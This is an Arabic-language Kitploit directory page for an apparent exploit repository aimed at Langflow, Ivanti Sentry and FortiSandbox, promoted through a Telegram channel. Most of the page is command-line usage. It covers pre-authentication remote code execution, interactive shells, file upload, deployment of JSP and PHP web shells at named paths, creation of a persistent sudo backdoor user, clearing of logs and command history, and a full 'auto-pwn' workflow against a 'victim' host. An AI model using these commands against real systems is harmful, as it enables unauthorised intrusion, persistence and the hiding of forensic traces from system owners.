Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5027-Langflow | Kitploit
أدوات/GitHubGitHub/layer-6/cve-2026-5027-langflow
تصعيد الامتيازاتآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
layer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

عرض المستودع

(CVE-2026-5027) و(CVE-2026-10520) (CVE-2026-25089) أداة الاستغلال:

استنساخ

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

استخدام ملف (exploit.py)

الاختبار والاستغلال التلقائي.

root@kitploit:~
python3 exploit.py -u https://target.com

إعدادات CLI المخصصة

استخدم الويب شل الخاص بك عندما يكون الشل داخل مجلد:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

عندما يكون الشل في مجلد الأداة أو داخل الطرفية بدون مجلد:

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

يمكن أن يكون الويب شل الخاص بك (PHP، Python (CGI)، Perl، Ruby، ASPX).

يمكنك ضبط المهلة الزمنية باستخدام --t وتحميل/استخدام الحمولة أو المسار المخصص من المجلدات والملفات باستخدام --p:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

مثال:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

استخدام ملف (exploitt.py)

مصمم لثغرات CVE التالية:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة

لا تتطلب بيانات اعتماد.

📖 الاستخدام

بدء سريع - قائمة تفاعلية (بدون وسائط)

root@kitploit:~
python3 exploitt.py

ثم اتبع التعليمات:

1. اختر نوع الهدف (Ivanti أو Forti)

  1. أدخل عنوان URL للهدف (مثل: https://192.168.1.100:8443)
  2. اضبط المهلة، البروكسي، وضع التصحيح
  3. اختر الإجراء (أمر، شل، ويب شل، إلخ.)

سطر الأوامر (متقدم)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# Check if vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# Interactive shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# Deploy JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# Create backdoor user + clean logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
  1. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# Single command
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# Interactive shell with file upload
python3 exploitt.py -u https://forti.example.com --type forti -s
# Inside shell: upload /path/local.txt /remote/path.txt

# Deploy PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w

# Full auto‑pwn (check, shell, webshell, persist, clean)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean

3. الكشف التلقائي (النص البرمجي يخمّن الخدمة)

root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"

4. استخدم البروكسي والتصحيح

root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

الوسائط المتاحة لسطر الأوامر

الوسيطة الوصف -u, --url عنوان URL للهدف (مثل: https://192.168.1.100:8443) --type فرض الخدمة: ivanti أو forti (اختياري، كشف تلقائي) -t, --timeout مهلة الطلب بالثواني (الافتراضي 30) --proxy بروكسي HTTP/HTTPS (مثل: http://127.0.0.1:8080) -d, --debug تفعيل مخرجات التصحيح --ua سلسلة User-Agent مخصصة -c, --cmd تنفيذ أمر واحد ثم الخروج -s, --shell تشغيل شل تفاعلي -w, --webshell نشر ويب شل (PHP لـ Forti، JSP لـ Ivanti) -p, --persist إنشاء مستخدم خلفي دائم بصلاحيات sudo --clean مسح السجلات وسجل الأوامر بعد الاستغلال

أوامر الشل التفاعلية

داخل الشل التفاعلي يمكنك استخدام:

الأمر المثال الوصف normal command id تنفيذ أي أمر نظام upload upload exploit.sh /tmp/backdoor.sh رفع ملف محلي إلى المضيف البعيد exit exit الخروج من الشل

تفاصيل نشر الويب شل

· Ivanti Sentry – ينشر شل بامتداد .jsp داخل تطبيقات Tomcat (/usr/local/tomcat/webapps/ROOT/) · الوصول عبر https://target/shell_random.jsp?cmd=whoami · FortiSandbox – ينشر شل بامتداد .php داخل جذر الويب (/var/www/html/) · الوصول عبر https://target/shell_random.php?cmd=whoami

مثال لسير العمل (اختبار اختراق كامل)

root@kitploit:~
# 1. Detect and exploit
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. Inside the shell, check privileges
id

# 3. Deploy webshell for persistence
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. Create a backdoor user
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. Clean logs
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

بواسطة قناة تيليجرام Red:

https://t.me/Red_Rooted_Ghost

تنزيل الأداة